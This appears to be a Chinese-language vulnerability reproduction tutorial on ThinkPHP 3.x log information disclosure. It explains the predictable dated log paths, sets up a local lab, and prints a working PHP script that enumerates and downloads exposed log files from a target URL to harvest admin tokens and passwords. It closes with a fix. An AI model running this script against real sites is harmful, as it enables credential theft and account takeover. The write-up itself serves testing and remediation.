ThinkPHP 日志信息泄露漏洞复现

漏洞简介
        ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志，而且debug很多网站都没有关
        ThinkPHP默认安装后，也会在Runtime目录下生成日志

        THINKPHP3.2 结构：Application\Runtime\Logs\Home\16_09_09.log
        THINKPHP3.1结构：Runtime\Logs\Home\16_09_09.log
        日志存储结构是 ：项目名\Runtime\Logs\Home\年份_月份_日期.log
      

注意：
日志信息非常详细，所以影响应该很大。

通过查看日志内容可以发现管理员的登录请求，访问该请求后，可以在不输入用户名密码的前提下直接获取该账户的token信息，并且成功登录该网站

查看日志获取管理员的密码

环境搭建: 

下载thinkphp3.2.3版本的源码，下载地址：框架下载 - ThinkPHP框架
下载后，使用phpstudy搭建

漏洞复现:

通过漏洞简介，我们知道了漏洞的原理，就是日志的存储结构为：项目名\Runtime\Logs\Home\年份_月份_日期.log，但是一个一个手工测试，太麻烦了，可以使用脚本进行测试，php脚本代码如下所示： 

<?php$url = "http://127.0.0.1/thinkphp_3.2.3/"; //目标网站$log = "/Application/Runtime/Logs/Home/"; //其中Application可能会变，比如App，需要自己测试$stime = "20"; //开始时间，2017年写17$etime = "21"; //结束时间，2018年写18$url = $url . $log;for ($i = $stime; $i <= $etime; $i++) {//1月到12月for ($j = 1; $j <= 12; $j++) {//1号到31号for ($d = 1; $d <= 31; $d++) {//tp3 Log格式：18_01_30.log$log = str_pad($i, 2, "0", STR_PAD_LEFT) . "_" . str_pad($j, 2, "0", STR_PAD_LEFT) . "_" . str_pad($d, 2, "0", STR_PAD_LEFT) . ".log";if (check_remote_file_exists($url . $log)) {file_put_contents($log, file_get_contents($url . $log));echo "Found out:$log\n";} else {echo "$log isn't exists\n";}}}}function check_remote_file_exists($url) {$curl = curl_init($url);curl_setopt($curl, CURLOPT_NOBODY, true);$result = curl_exec($curl);$found = false;if ($result !== false) {$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);if ($statusCode == 200) {$found = true;}}curl_close($curl);return $found;}

运行过程：

需要将tp3.php与php.exe放在同一目录下才行

运行命令如下图所示

如果存在日志信息泄露的话，会有相关提示信息，如下图所示

截至目前为止，thinkphp3与thinkphp5都存在日志信息泄露漏洞。

实战记录可参考以下案例：

从外网Thinkphp3日志到杀入内网域控-红队攻击之域内靶机渗透实战演练
https://cloud.tencent.com/developer/article/1752185

https://blog.csdn.net/Fly_hps/article/details/81201904

漏洞修复

删除Runtime/Logs下的所有文件，并将APP_DEBUG设置为false